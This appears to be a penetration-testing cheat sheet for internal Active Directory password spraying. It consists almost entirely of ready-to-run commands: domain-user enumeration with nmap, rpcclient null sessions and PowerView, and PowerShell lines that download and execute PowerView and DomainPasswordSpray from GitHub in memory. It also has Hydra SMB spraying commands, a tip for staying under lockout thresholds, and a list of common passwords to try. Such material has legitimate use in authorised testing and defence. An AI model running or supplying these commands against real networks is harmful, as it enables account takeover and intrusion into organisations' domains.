Internal Password Spraying
Internal Password Spraying
Get domain users using Kerberos
dig _ldap._tcp.dc._msdcs.Domain_Name // Find Domain Controller
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=users.txt 10.196.1.13Get domain users using powerview
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1");
Get-DomainUser | select samaccountname > users.txtGet domain users using rpcclient
nmap -Pn -sS -p389,88 --open 10.10.0.0/16 // Find Domain Controller
rpcclient -U "" -N 10.10.1.50 // Authenticate Using Null Session
rpcclient -U "MEGA\hsaad" 10.10.1.50 // Authenticate Using Domain User & Password
>> enumdomusers // Enumerate All Domain UsersGet domain password policy using powerview
(Get-DomainPolicy)."SystemAccess"Get domain password policy using rpcclient
>> getdompwinfoPassword Spraying Using Hydra
Don't forget the lockout threshold if it exists, for example, if it set for 5 tries in 30 minutes, then can only try 4 failed attempts on every account every 30 minutes.
hydra -V -L users.txt -P pass.txt -m MEGA.local -t 1 10.10.1.50 smb
hydra -V -L users.txt -e nsr -m MEGA.local -t 1 10.10.1.50 smbPassword Spraying Using DomainPasswordSpray
By default, the tool will enumerate the users in the domain, then will filter from them any disabled account or any account that reaches the limit of the lockout.
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1");
Invoke-DomainPasswordSpray -Password Spring2017
Invoke-DomainPasswordSpray -UserList users.txt -PasswordList passlist.txtCommon Passwords
12345
123456
123456789
P@ssw0rd
P@ssword
P@ssword@123
password@123
Company_name@123
admin@123Last updated